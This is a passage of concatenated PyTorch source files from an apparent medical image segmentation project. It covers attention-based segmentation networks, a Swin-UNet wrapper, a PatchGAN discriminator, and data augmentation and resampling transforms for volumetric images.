attention1_2=self.conv8_3((attn_cam2+attn_pam2)*self.conv_sem_1_3(semanticModule_1_3)) semVector_1_4, semanticModule_1_4 = self.semanticModule_1_1(torch.cat((down1, fuse1), 1)) attn_pam1 = self.pam_attention_1_1(torch.cat((down1, fuse1), 1)) attn_cam1 = self.cam_attention_1_1(torch.cat((down1, fuse1), 1)) attention1_1 = self.conv8_4((attn_cam1+attn_pam1) * self.conv_sem_1_4(semanticModule_1_4)) ##new design with stacked attention semVector_2_1, semanticModule_2_1 = self.semanticModule_2_1(torch.cat((down4, attention1_4 * fuse1), 1)) refine4_1 = self.pam_attention_2_4(torch.cat((down4,attention1_4*fuse1),1)) refine4_2 = self.cam_attention_2_4(torch.cat((down4,attention1_4*fuse1),1)) refine4 = self.conv8_11((refine4_1+refine4_2) * self.conv_sem_2_1(semanticModule_2_1)) semVector_2_2, semanticModule_2_2 = self.semanticModule_2_1(torch.cat((down3, attention1_3 * fuse1), 1)) refine3_1 = self.pam_attention_2_3(torch.cat((down3,attention1_3*fuse1),1)) refine3_2 = self.cam_attention_2_3(torch.cat((down3,attention1_3*fuse1),1)) refine3 = self.conv8_12((refine3_1+refine3_2) * self.conv_sem_2_2(semanticModule_2_2)) semVector_2_3, semanticModule_2_3 = self.semanticModule_2_1(torch.cat((down2, attention1_2 * fuse1), 1)) refine2_1 = self.pam_attention_2_2(torch.cat((down2,attention1_2*fuse1),1)) refine2_2 = self.cam_attention_2_2(torch.cat((down2,attention1_2*fuse1),1)) refine2 = self.conv8_13((refine2_1+refine2_2)*self.conv_sem_2_3(semanticModule_2_3)) semVector_2_4, semanticModule_2_4 = self.semanticModule_2_1(torch.cat((down1, attention1_1 * fuse1), 1)) refine1_1 = self.pam_attention_2_1(torch.cat((down1,attention1_1 * fuse1),1)) refine1_2 = self.cam_attention_2_1(torch.cat((down1,attention1_1 * fuse1),1)) refine1=self.conv8_14((refine1_1+refine1_2) * self.conv_sem_2_4(semanticModule_2_4)) predict4_2 = self.predict4_2(refine4) predict3_2 = self.predict3_2(refine3) predict2_2 = self.predict2_2(refine2) predict1_2 = self.predict1_2(refine1) predict1 = F.upsample(predict1, size=x.size()[2:], mode='bilinear') predict2 = F.upsample(predict2, size=x.size()[2:], mode='bilinear') predict3 = F.upsample(predict3, size=x.size()[2:], mode='bilinear') predict4 = F.upsample(predict4, size=x.size()[2:], mode='bilinear') predict1_2 = F.upsample(predict1_2, size=x.size()[2:], mode='bilinear') predict2_2 = F.upsample(predict2_2, size=x.size()[2:], mode='bilinear') predict3_2 = F.upsample(predict3_2, size=x.size()[2:], mode='bilinear') predict4_2 = F.upsample(predict4_2, size=x.size()[2:], mode='bilinear') # if self.training: # return semVector_1_1,\ # semVector_2_1, \ # semVector_1_2, \ # semVector_2_2, \ # semVector_1_3, \ # semVector_2_3, \ # semVector_1_4, \ # semVector_2_4, \ # torch.cat((down1, fuse1), 1),\ # torch.cat((down2, fuse1), 1),\ # torch.cat((down3, fuse1), 1),\ # torch.cat((down4, fuse1), 1), \ # torch.cat((down1, attention1_1 * fuse1), 1), \ # torch.cat((down2, attention1_2 * fuse1), 1), \ # torch.cat((down3, attention1_3 * fuse1), 1), \ # torch.cat((down4, attention1_4 * fuse1), 1), \ # semanticModule_1_4, \ # semanticModule_1_3, \ # semanticModule_1_2, \ # semanticModule_1_1, \ # semanticModule_2_4, \ # semanticModule_2_3, \ # semanticModule_2_2, \ # semanticModule_2_1, \ # predict1, \ # predict2, \ # predict3, \ # predict4, \ # predict1_2, \ # predict2_2, \ # predict3_2, \ # predict4_2 return predict4_2 # else: # return ((predict1_2 + predict2_2 + predict3_2 + predict4_2) / 4) if __name__ == '__main__': model = DAF_stack(in_channels=2, out_channels_end=2) t1 = torch.rand(1, 2, 256, 256) out = model(t1) print(out.shape) ``` #### File: nets/msga_net/resnext.py ```python from functools import reduce import torch import torch.nn as nn from torchvision.models import resnext50_32x4d, resnext101_32x8d class LambdaBase(nn.Sequential): def __init__(self, fn, *args): super(LambdaBase, self).__init__(*args) self.lambda_func = fn def forward_prepare(self, input): output = [] for module in self._modules.values(): output.append(module(input)) return output if output else input class Lambda(LambdaBase): def forward(self, input): return self.lambda_func(self.forward_prepare(input)) class LambdaMap(LambdaBase): def forward(self, input): return list(map(self.lambda_func, self.forward_prepare(input))) class LambdaReduce(LambdaBase): def forward(self, input): return reduce(self.lambda_func, self.forward_prepare(input)) def resnext50(): model = resnext50_32x4d() model.conv1 = nn.Conv2d(1, 64, (7, 7), (2, 2), (3, 3), 1, 1, bias = False) model.avgpool = nn.AvgPool2d((7,7), (1, 1)) model.fc = nn.Sequential( Lambda(lambda x: x.view(x.size(0), -1)), Lambda(lambda x: x.view(1, -1) if 1 == len(x.size()) else x), nn.Linear(2048, 1000) ) return model def resnext101(in_channels): model = resnext101_32x8d() model.conv1 = nn.Conv2d(in_channels, 64, (7, 7), (2, 2), (3, 3), 1, 1, bias = False) model.avgpool = nn.AvgPool2d((7,7), (1, 1)) model.fc = nn.Sequential( Lambda(lambda x: x.view(x.size(0), -1)), Lambda(lambda x: x.view(1, -1) if 1 == len(x.size()) else x), nn.Linear(2048, 1000) ) return model ``` #### File: networks/nets/ss_net.py ```python import torch import torch.nn as nn import torch.nn.functional as F import torch.nn.init as init import torch.utils.model_zoo as model_zoo from torchvision import models import math class GCN(nn.Module): def __init__(self, inplanes, planes, ks=7): super(GCN, self).__init__() self.conv_t = nn.Conv2d(inplanes, planes, kernel_size=ks, padding=int(ks/2)) def forward(self, x): x = self.conv_t(x) return x class Refine(nn.Module): def __init__(self, planes): super(Refine, self).__init__() self.bn = nn.BatchNorm2d(planes) self.relu = nn.ReLU(inplace=True) self.conv1 = nn.Conv2d(planes, planes, kernel_size=3, padding=1) self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, padding=1) def forward(self, x): residual = x x = self.bn(x) x = self.relu(x) x = self.conv1(x) x = self.bn(x) x = self.relu(x) x = self.conv2(x) out = residual + x return out class SSNet(nn.Module): def __init__(self, num_classes): super(SSNet, self).__init__() self.num_classes = num_classes resnet = models.resnet50(pretrained=True) self.conv1 = resnet.conv1 self.bn0 = resnet.bn1 self.relu = resnet.relu self.maxpool = resnet.maxpool self.layer1 = resnet.layer1 self.layer2 = resnet.layer2 self.layer3 = resnet.layer3 self.layer4 = resnet.layer4 self.gcn1 = GCN(2048, self.num_classes) self.gcn2 = GCN(1024, self.num_classes) self.gcn3 = GCN(512, self.num_classes) self.gcn4 = GCN(256, self.num_classes) self.gcn5 = GCN(64, self.num_classes) self.refine1 = Refine(self.num_classes) self.refine2 = Refine(self.num_classes) self.refine3 = Refine(self.num_classes) self.refine4 = Refine(self.num_classes) self.refine5 = Refine(self.num_classes) self.refine6 = Refine(self.num_classes) self.refine7 = Refine(self.num_classes) self.refine8 = Refine(self.num_classes) self.refine9 = Refine(self.num_classes) self.refine10 = Refine(self.num_classes) def forward(self, x): input = x x = self.conv1(x) x = self.bn0(x) x = self.relu(x) conv_x = x x = self.maxpool(x) pool_x = x fm1 = self.layer1(x) fm2 = self.layer2(fm1) fm3 = self.layer3(fm2) fm4 = self.layer4(fm3) gcfm1 = self.refine1(self.gcn1(fm4)) gcfm2 = self.refine2(self.gcn2(fm3)) gcfm3 = self.refine3(self.gcn3(fm2)) gcfm4 = self.refine4(self.gcn4(fm1)) gcfm5 = self.refine5(self.gcn5(pool_x)) fs1 = self.refine6(F.upsample_bilinear(gcfm1, fm3.size()[2:]) + gcfm2) fs2 = self.refine7(F.upsample_bilinear(fs1, fm2.size()[2:]) + gcfm3) fs3 = self.refine8(F.upsample_bilinear(fs2, fm1.size()[2:]) + gcfm4) fs4 = self.refine9(F.upsample_bilinear(fs3, pool_x.size()[2:]) + gcfm5) out = self.refine10(F.upsample_bilinear(fs4, input.size()[2:])) return out if __name__ == '__main__': net = SSNet(1) t1 = torch.rand(1, 3, 128, 128) out = net(t1) print(out.shape) ``` #### File: nets/swin_unet/model.py ```python import torch import numpy import torch.nn as nn import copy from medical_seg.networks.nets.swin_unet.swin_transformer_unet_skip_expand_decoder_sys import SwinTransformerSys class SwinUnet(nn.Module): def __init__(self, img_size=224, in_channel=3, num_classes=21843, zero_head=False, vis=False): super(SwinUnet, self).__init__() self.num_classes = num_classes self.loss_func = nn.CrossEntropyLoss() self.zero_head = zero_head self.in_channels = in_channel self.swin_unet = SwinTransformerSys(img_size=img_size, patch_size=4, in_chans=in_channel, num_classes=self.num_classes, embed_dim=96, depths=[ 2, 2, 2, 2 ], num_heads=[ 3, 6, 12, 24 ], window_size=7, mlp_ratio=4, qkv_bias=True, qk_scale=False, drop_rate=0.2, drop_path_rate=0.2, ape=False, patch_norm=True, use_checkpoint=False) def forward_train(self, x): ## x : (batch, modality, d, w, h ) input = x.squeeze(dim=0) input2d = input.permute(1, 0, 2, 3) d, in_channels, w, h = input2d.shape if w != 224 or h != 224: input2d = nn.functional.interpolate(input2d, size=(224, 224), mode="bilinear", align_corners=False) logits = self.swin_unet(input2d) logits = logits.transpose(1, 0) logits = logits.unsqueeze(dim=0) return logits def forward(self, x): ## x : (batch, modality, d, w, h ) input = x.squeeze(dim=0) input2d = input.permute(1, 0, 2, 3) d, in_channels, w, h = input2d.shape if w != 224 or h != 224: input2d = nn.functional.interpolate(input2d, size=(224, 224), mode="bilinear", align_corners=False) logits = self.swin_unet(input2d) if w != 224 or h != 224: logits = nn.functional.interpolate(logits, size=(w, h), mode="bilinear", align_corners=False) logits = logits.transpose(1, 0) logits = logits.unsqueeze(dim=0) return logits def compute_loss(self, pred, label): b, d, w, h = label.shape label = label.float() if w != 224 or h != 224: label = torch.unsqueeze(label, dim=1) label = nn.functional.interpolate(label, size=(d, 224, 224), mode="nearest") label = torch.squeeze(label, dim=1).long() loss = self.loss_func(pred, label) return loss def load_from(self, pretrained_path): device = next(self.swin_unet.parameters()).device print("pretrained_path:{}".format(pretrained_path)) pretrained_dict = torch.load(pretrained_path, map_location=device) pretrained_dict = pretrained_dict['model'] if self.in_channels != 3: embed_weight = pretrained_dict["patch_embed.proj.weight"] embed_weight = embed_weight.mean(dim=1, keepdims=True) embed_weight = embed_weight.repeat(1, self.in_channels, 1, 1) pretrained_dict["patch_embed.proj.weight"] = embed_weight print("---start load pretrained modle of swin encoder---") model_dict = self.swin_unet.state_dict() full_dict = copy.deepcopy(pretrained_dict) for k, v in pretrained_dict.items(): if "layers." in k: current_layer_num = 3-int(k[7:8]) current_k = "layers_up." + str(current_layer_num) + k[8:] full_dict.update({current_k:v}) for k in list(full_dict.keys()): if k in model_dict: if full_dict[k].shape != model_dict[k].shape: print("delete:{};shape pretrain:{};shape model:{}".format(k,v.shape,model_dict[k].shape)) del full_dict[k] self.swin_unet.load_state_dict(full_dict, strict=False) if __name__ == "__main__": net_3d = SwinUnet(img_size=224, in_channel=4, num_classes=2) net_3d.load_from("./medical_seg/networks/nets/swin_unet//swin_tiny_patch4_window7_224.pth") t1 = torch.rand(1, 4, 5, 224, 224) out = net_3d(t1) print(out.shape) ``` #### File: networks/PatchGAN/discriminator.py ```python import torch import torch.nn as nn import numpy as np # Defines the PatchGAN discriminator with the specified arguments. class NLayerDiscriminator(nn.Module): def __init__(self, input_nc, mse=True, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, device="cpu"): super(NLayerDiscriminator, self).__init__() self.device = device self.to(device) kw = 4 padw = int(np.ceil((kw-1)/2)) sequence = [ nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True) ] nf_mult = 1 nf_mult_prev = 1 for n in range(1, n_layers): nf_mult_prev = nf_mult nf_mult = min(2**n, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw), # TODO: use InstanceNorm norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True) ] nf_mult_prev = nf_mult nf_mult = min(2**n_layers, 8) sequence += [ nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw), # TODO: useInstanceNorm norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True) ] sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] self.model = nn.Sequential(*sequence) if mse: self.loss = nn.MSELoss() else: self.loss = nn.CrossEntropyLoss() def forward(self, input): # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor): # return nn.parallel.data_parallel(self.model, input, self.gpu_ids) # else: return self.model(input) def get_loss_D(self, x, pred_res, label): if len(label.shape) == 3: label = label.unsqueeze(1) # x: (1, 2, 256, 256) # pred_res: (1, 1, 256, 256) fake_AB = torch.cat((x, pred_res), 1) pred_fake = self.forward(fake_AB.detach())# detach 是为了只更新d的参数,而不去更新分割网络的参数! fake_label = torch.zeros_like(pred_fake, device=self.device) loss_D_fake = self.loss(pred_fake, fake_label) # Real real_AB = torch.cat((x, label), 1) pred_real = self.forward(real_AB) real_label = torch.ones_like(pred_real, device=self.device) loss_D_real = self.loss(pred_real, real_label) # Combined loss loss_D = (loss_D_fake + loss_D_real) * 0.5 return loss_D if __name__ == '__main__': t1 = torch.rand(1, 2, 128, 128) label = torch.rand(1, 1, 128, 128) pred_res = torch.rand(1, 1, 128, 128) model = NLayerDiscriminator(input_nc=3) # out = model(t1) # print(out.shape) out_loss = model.get_loss_D(t1, pred_res, label) print(out_loss) print(out_loss.shape) ``` #### File: medical_seg/transformer/color_transformers.py ```python import random import numpy as np from typing import Tuple, List, Hashable, Callable, Union from scipy.ndimage import gaussian_filter class ContrastAugmentationTransform: def __init__(self, random_state, contrast_range: Union[Tuple[float, float], Callable[[], float]] = (0.75, 1.25), preserve_range: bool = True, per_channel: bool = True, data_key: str = "data", execution_probability: float = 0.1, p_per_channel: float = 1): """ Augments the contrast of data :param contrast_range: (float, float): range from which to sample a random contrast that is applied to the data. If one value is smaller and one is larger than 1, half of the contrast modifiers will be >1 and the other half <1 (in the inverval that was specified) callable : must be contrast_range() -> float :param preserve_range: if True then the intensity values after contrast augmentation will be cropped to min and max values of the data before augmentation. :param per_channel: whether to use the same contrast modifier for all color channels or a separate one for each channel :param data_key: :param p_per_sample: """ self.random_state = random_state self.execution_probability = execution_probability self.data_key = data_key self.contrast_range = contrast_range self.preserve_range = preserve_range self.per_channel = per_channel self.p_per_channel = p_per_channel def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_contrast(self.random_state, data, contrast_range=self.contrast_range, preserve_range=self.preserve_range, per_channel=self.per_channel, p_per_channel=self.p_per_channel) return data def augment_contrast(random_state, data_sample: np.ndarray, contrast_range: Union[Tuple[float, float], Callable[[], float]] = (0.75, 1.25), preserve_range: bool = True, per_channel: bool = True, p_per_channel: float = 1) -> np.ndarray: if not per_channel: if callable(contrast_range): factor = contrast_range() else: if random_state.uniform() < 0.5 and contrast_range[0] < 1: factor = random_state.uniform(contrast_range[0], 1) else: factor = random_state.uniform(max(contrast_range[0], 1), contrast_range[1]) for c in range(data_sample.shape[0]): if random_state.uniform() < p_per_channel: mn = data_sample[c].mean() if preserve_range: minm = data_sample[c].min() maxm = data_sample[c].max() data_sample[c] = (data_sample[c] - mn) * factor + mn if preserve_range: data_sample[c][data_sample[c] < minm] = minm data_sample[c][data_sample[c] > maxm] = maxm else: for c in range(data_sample.shape[0]): if random_state.uniform() < p_per_channel: if callable(contrast_range): factor = contrast_range() else: if random_state.uniform() < 0.5 and contrast_range[0] < 1: factor = random_state.uniform(contrast_range[0], 1) else: factor = random_state.uniform(max(contrast_range[0], 1), contrast_range[1]) mn = data_sample[c].mean() if preserve_range: minm = data_sample[c].min() maxm = data_sample[c].max() data_sample[c] = (data_sample[c] - mn) * factor + mn if preserve_range: data_sample[c][data_sample[c] < minm] = minm data_sample[c][data_sample[c] > maxm] = maxm return data_sample class BrightnessTransform: def __init__(self, mu, sigma, per_channel=True, data_key="data", p_per_sample=1, p_per_channel=1): """ Augments the brightness of data. Additive brightness is sampled from Gaussian distribution with mu and sigma :param mu: mean of the Gaussian distribution to sample the added brightness from :param sigma: standard deviation of the Gaussian distribution to sample the added brightness from :param per_channel: whether to use the same brightness modifier for all color channels or a separate one for each channel :param data_key: :param p_per_sample: """ self.p_per_sample = p_per_sample self.data_key = data_key self.mu = mu self.sigma = sigma self.per_channel = per_channel self.p_per_channel = p_per_channel def __call__(self, **data_dict): data = data_dict[self.data_key] for b in range(data.shape[0]): if np.random.uniform() < self.p_per_sample: data[b] = augment_brightness_additive(data[b], self.mu, self.sigma, self.per_channel, p_per_channel=self.p_per_channel) data_dict[self.data_key] = data return data_dict def augment_brightness_additive(data_sample, mu:float, sigma:float , per_channel:bool=True, p_per_channel:float=1.): """ data_sample must have shape (c, x, y(, z))) :param data_sample: :param mu: :param sigma: :param per_channel: :param p_per_channel: :return: """ if not per_channel: rnd_nb = np.random.normal(mu, sigma) for c in range(data_sample.shape[0]): if np.random.uniform() <= p_per_channel: data_sample[c] += rnd_nb else: for c in range(data_sample.shape[0]): if np.random.uniform() <= p_per_channel: rnd_nb = np.random.normal(mu, sigma) data_sample[c] += rnd_nb return data_sample class BrightnessMultiplicativeTransform: def __init__(self, random_state, multiplier_range=(0.75, 1.25), per_channel=True, data_key="data", execution_probability=1): """ Augments the brightness of data. Multiplicative brightness is sampled from multiplier_range :param multiplier_range: range to uniformly sample the brightness modifier from :param per_channel: whether to use the same brightness modifier for all color channels or a separate one for each channel :param data_key: :param p_per_sample: """ self.random_state = random_state self.data_key = data_key self.multiplier_range = multiplier_range self.per_channel = per_channel self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_brightness_multiplicative(self.random_state, data, self.multiplier_range, self.per_channel) return data def augment_brightness_multiplicative(random_state, data_sample, multiplier_range=(0.5, 2), per_channel=True): multiplier = random_state.uniform(multiplier_range[0], multiplier_range[1]) if not per_channel: data_sample *= multiplier else: for c in range(data_sample.shape[0]): multiplier = random_state.uniform(multiplier_range[0], multiplier_range[1]) data_sample[c] *= multiplier return data_sample ``` #### File: medical_seg/transformer/noisy_transformers.py ```python import random import numpy as np from typing import Tuple, List, Hashable from scipy.ndimage import gaussian_filter class GaussianNoiseTransform: def __init__(self, random_state, noise_variance=(0, 0.1), p_per_channel: float = 1, per_channel: bool = False, data_key="data", execution_probability=0.2): """ Adds additive Gaussian Noise :param noise_variance: variance is uniformly sampled from that range :param p_per_sample: :param p_per_channel: :param per_channel: if True, each channel will get its own variance sampled from noise_variance :param data_key: CAREFUL: This transform will modify the value range of your data! """ self.random_state = random_state self.data_key = data_key self.noise_variance = noise_variance self.p_per_channel = p_per_channel self.per_channel = per_channel self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_gaussian_noise(self.random_state, data, self.noise_variance, self.p_per_channel, self.per_channel) return data def augment_gaussian_noise(random_state, data_sample: np.ndarray, noise_variance: Tuple[float, float] = (0, 0.1), p_per_channel: float = 1, per_channel: bool = False) -> np.ndarray: if not per_channel: variance = noise_variance[0] if noise_variance[0] == noise_variance[1] else \ random.uniform(noise_variance[0], noise_variance[1]) else: variance = None for c in range(data_sample.shape[0]): if random_state.uniform() < p_per_channel: # lol good luck reading this variance_here = variance if variance is not None else \ noise_variance[0] if noise_variance[0] == noise_variance[1] else \ random.uniform(noise_variance[0], noise_variance[1]) # bug fixed: https://github.com/MIC-DKFZ/batchgenerators/issues/86 data_sample[c] = data_sample[c] + np.random.normal(0.0, variance_here, size=data_sample[c].shape) return data_sample def augment_gaussian_blur(random_state, data_sample: np.ndarray, sigma_range: Tuple[float, float], per_channel: bool = True, p_per_channel: float = 1, different_sigma_per_axis: bool = False, p_isotropic: float = 0) -> np.ndarray: if not per_channel: # Godzilla Had a Stroke Trying to Read This and F***ing Died # https://i.kym-cdn.com/entries/icons/original/000/034/623/Untitled-3.png sigma = get_range_val(sigma_range) if ((not different_sigma_per_axis) or ((np.random.uniform() < p_isotropic) and different_sigma_per_axis)) \ else [get_range_val(sigma_range) for _ in data_sample.shape[1:]] else: sigma = None for c in range(data_sample.shape[0]): if random_state.uniform() <= p_per_channel: if per_channel: sigma = get_range_val(sigma_range) if ((not different_sigma_per_axis) or ((np.random.uniform() < p_isotropic) and different_sigma_per_axis)) \ else [get_range_val(sigma_range) for _ in data_sample.shape[1:]] data_sample[c] = gaussian_filter(data_sample[c], sigma, order=0) return data_sample class GaussianBlurTransform: def __init__(self, random_state, blur_sigma: Tuple[float, float] = (1, 5), different_sigma_per_channel: bool = True, different_sigma_per_axis: bool = False, p_isotropic: float = 0, p_per_channel: float = 0.5, data_key: str = "data", execution_probability=0.2): """ :param blur_sigma: :param data_key: :param different_sigma_per_axis: if True, anisotropic kernels are possible :param p_isotropic: only applies if different_sigma_per_axis=True, p_isotropic is the proportion of isotropic kernels, the rest gets random sigma per axis :param different_sigma_per_channel: whether to sample a sigma for each channel or all channels at once :param p_per_channel: probability of applying gaussian blur for each channel. Default = 1 (all channels are blurred with prob 1) """ self.random_state = random_state self.different_sigma_per_channel = different_sigma_per_channel self.p_per_channel = p_per_channel self.data_key = data_key self.blur_sigma = blur_sigma self.different_sigma_per_axis = different_sigma_per_axis self.p_isotropic = p_isotropic self.execution_probability = execution_probability def __call__(self, data): if self.random_state.uniform() < self.execution_probability: data = augment_gaussian_blur(self.random_state, data, self.blur_sigma, self.different_sigma_per_channel, self.p_per_channel, different_sigma_per_axis=self.different_sigma_per_axis, p_isotropic=self.p_isotropic) return data def get_range_val(value, rnd_type="uniform"): if isinstance(value, (list, tuple, np.ndarray)): if len(value) == 2: if value[0] == value[1]: n_val = value[0] else: orig_type = type(value[0]) if rnd_type == "uniform": n_val = random.uniform(value[0], value[1]) elif rnd_type == "normal": n_val = random.normalvariate(value[0], value[1]) n_val = orig_type(n_val) elif len(value) == 1: n_val = value[0] else: raise RuntimeError("value must be either a single value or a list/tuple of len 2") return n_val else: return value ``` #### File: medical_seg/transformer/transforms.py ```python from functools import total_ordering from operator import is_ import numpy as np from typing import Callable, Iterable, List, Optional, Sequence, Tuple, Union from numpy import random from scipy.ndimage import rotate, map_coordinates, gaussian_filter import h5py from itertools import chain from batchgenerators.augmentations.utils import resize_segmentation import matplotlib.pyplot as plt import torch from .utils import generate_pos_neg_label_crop_centers, \ create_zero_centered_coordinate_mesh, \ elastic_deform_coordinates, \ interpolate_img, scale_coords,\ augment_gamma, augment_mirroring, is_positive, generate_spatial_bounding_box,\ Pad from medical_seg.utils import resample_image_array_size from .utils import resample_data_or_seg RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD = 3 def get_do_separate_z(spacing, anisotropy_threshold=RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD): do_separate_z = (np.max(spacing) / np.min(spacing)) > anisotropy_threshold return do_separate_z def get_lowres_axis(new_spacing): axis = np.where(max(new_spacing) / np.array(new_spacing) == 1)[0] # find which axis is anisotropic return axis def resample_patient(data, seg, original_spacing, target_spacing, order_data=3, order_seg=0, force_separate_z=False, order_z_data=0, order_z_seg=0, separate_z_anisotropy_threshold=RESAMPLING_SEPARATE_Z_ANISO_THRESHOLD): """ :param data: :param seg: :param original_spacing: :param target_spacing: :param order_data: :param order_seg: :param force_separate_z: if None then we dynamically decide how to resample along z, if True/False then always /never resample along z separately :param order_z_seg: only applies if do_separate_z is True :param order_z_data: only applies if do_separate_z is True :param separate_z_anisotropy_threshold: if max_spacing > separate_z_anisotropy_threshold * min_spacing (per axis) then resample along lowres axis with order_z_data/order_z_seg instead of order_data/order_seg :return: """ assert not ((data is None) and (seg is None)) if data is not None: assert len(data.shape) == 4, "data must be c x y z" if seg is not None: if len(seg.shape) == 3: seg = np.expand_dims(seg, axis=0) assert len(seg.shape) == 4, "seg must be c x y z" if data is not None: shape = np.array(data[0].shape) else: shape = np.array(seg[0].shape) new_shape = np.round(((np.array(original_spacing) / np.array(target_spacing)).astype(float) * shape)).astype(int) if force_separate_z is not None: do_separate_z = force_separate_z if force_separate_z: axis = get_lowres_axis(original_spacing) else: axis = None else: if get_do_separate_z(original_spacing, separate_z_anisotropy_threshold): do_separate_z = True axis = get_lowres_axis(original_spacing) elif get_do_separate_z(target_spacing, separate_z_anisotropy_threshold): do_separate_z = True axis = get_lowres_axis(target_spacing) else: do_separate_z = False axis = None if axis is not None: if len(axis) == 3: # every axis has the spacing, this should never happen, why is this code here? do_separate_z = False elif len(axis) == 2: # this happens for spacings like (0.24, 1.25, 1.25) for example. In that case we do not want to resample # separately in the out of plane axis do_separate_z = False else: pass if data is not None: data_reshaped = resample_data_or_seg(data, new_shape, False, axis, order_data, do_separate_z, order_z=order_z_data) else: data_reshaped = None if seg is not None: seg_reshaped = resample_data_or_seg(seg, new_shape, True, axis, order_seg, do_separate_z, order_z=order_z_seg) else: seg_reshaped = None if len(seg_reshaped.shape) == 4: seg_reshaped = np.squeeze(seg_reshaped, axis=0) return data_reshaped, seg_reshaped class ResampleImage: def __init__(self, resample_size, order=[3, 0]) -> None: self.rsize = resample_size self.order = order def __call__(self, image, label=None): if len(image.shape) == 3: image = np.expand_dims(image, axis=0) c = image.shape[0] image = resample_image_array_size(image, out_size=(c,) + self.rsize, order=self.order[0]) if label is not None: label = resample_image_array_size(label, out_size=self.rsize, order=self.order[1]) return image, label class CropForegroundImageLabel: def __init__(self, select_fn: Callable = is_positive, channel_indices = None, margin = 0, mode = ["constant"] ): pass self.cropper = CropForeground( select_fn=select_fn, channel_indices=channel_indices, margin=margin ) self.mode = mode def __call__(self, image, label=None): if len(image.shape) == 3: image = np.expand_dims(image, axis=0) box_start, box_end = self.cropper.compute_bounding_box(image) print(box_start, box_end) # d[self.start_coord_key] = box_start # d[self.end_coord_key] = box_end # for key, m in self.key_iterator(d, self.mode): # self.push_transform(d, key, extra_info={"box_start": box_start, "box_end": box_end}) image = self.cropper.crop_pad(img=image, box_start=box_start, box_end=box_end, mode=self.mode[0]) if label is not None : if len(label.shape) == 3: label = np.expand_dims(label, axis=0) label = self.cropper.crop_pad(img=label, box_start=box_start, box_end=box_end, mode=self.mode[1]) if len(label.shape) == 4: label = np.squeeze(label, axis=0) return image, label class CropForeground(): """ Crop an image using a bounding box. The bounding box is generated by selecting foreground using select_fn at channels channel_indices. margin is added in each spatial dimension of the bounding box. The typical usage is to help training and evaluation if the valid part is small in the whole medical image. Users can define arbitrary function to select expected foreground from the whole image or specified channels. And it can also add margin to every dim of the bounding box of foreground object. For example: .. code-block:: python image = np.array( [[[0, 0, 0, 0, 0], [0, 1, 2, 1, 0], [0, 1, 3, 2, 0], [0, 1, 2, 1, 0], [0, 0, 0, 0, 0]]]) # 1x5x5, single channel 5x5 image def threshold_at_one(x): # threshold at 1 return x > 1 cropper = CropForeground(select_fn=threshold_at_one, margin=0) print(cropper(image)) [[[2, 1], [3, 2], [2, 1]]] """ def __init__( self, select_fn: Callable = is_positive, channel_indices = None, margin: Union[Sequence[int], int] = 0, return_coords: bool = False, mode: str = "constant", **np_kwargs, ) -> None: """ Args: select_fn: function to select expected foreground, default is to select values > 0. channel_indices: if defined, select foreground only on the specified channels of image. if None, select foreground on the whole image. margin: add margin value to spatial dims of the bounding box, if only 1 value provided, use it for all dims. return_coords: whether return the coordinates of spatial bounding box for foreground. k_divisible: make each spatial dimension to be divisible by k, default to 1. if `k_divisible` is an int, the same `k` be applied to all the input spatial dimensions. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to ``"constant"``. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html np_kwargs: other args for `np.pad` API, note that `np.pad` treats channel dimension as the first dimension. more details: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html """ self.select_fn = select_fn self.channel_indices = channel_indices self.margin = margin self.return_coords = return_coords self.mode = mode self.np_kwargs = np_kwargs def compute_bounding_box(self, img): """ Compute the start points and end points of bounding box to crop. And adjust bounding box coords to be divisible by `k`. """ box_start, box_end = generate_spatial_bounding_box(img, self.select_fn, self.channel_indices, self.margin) # box_start_, *_ = convert_data_type(box_start, output_type=np.ndarray, dtype=np.int16, wrap_sequence=True) # box_end_, *_ = convert_data_type(box_end, output_type=np.ndarray, dtype=np.int16, wrap_sequence=True) # print(box_start) # print(box_end) box_start = np.array(box_start) box_end = np.array(box_end) orig_spatial_size = box_end - box_start # make the spatial size divisible by `k` spatial_size = np.array(orig_spatial_size) # spatial_size = np.asarray(compute_divisible_spatial_size(orig_spatial_size.tolist(), k=self.k_divisible)) # update box_start and box_end box_start_ = box_start - np.floor_divide(np.asarray(spatial_size) - orig_spatial_size, 2) box_end_ = box_start + spatial_size return box_start_, box_end_ def crop_pad( self, img, box_start: np.ndarray, box_end: np.ndarray, mode = None, ): """ Crop and pad based on the bounding box. """ cropped = SpatialCrop(roi_start=box_start, roi_end=box_end)(img) pad_to_start = np.maximum(-box_start, 0) pad_to_end = np.maximum(box_end - np.asarray(img.shape[1:]), 0) pad = list(chain(*zip(pad_to_start.tolist(), pad_to_end.tolist()))) return BorderPad(spatial_border=pad, mode=mode or self.mode, **self.np_kwargs)(cropped) def __call__(self, img, mode = None): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't change the channel dim. """ box_start, box_end = self.compute_bounding_box(img) cropped = self.crop_pad(img, box_start, box_end, mode) if self.return_coords: return cropped, box_start, box_end return cropped class Random: def __init__(self, seed) -> None: self.seed = seed self.R = 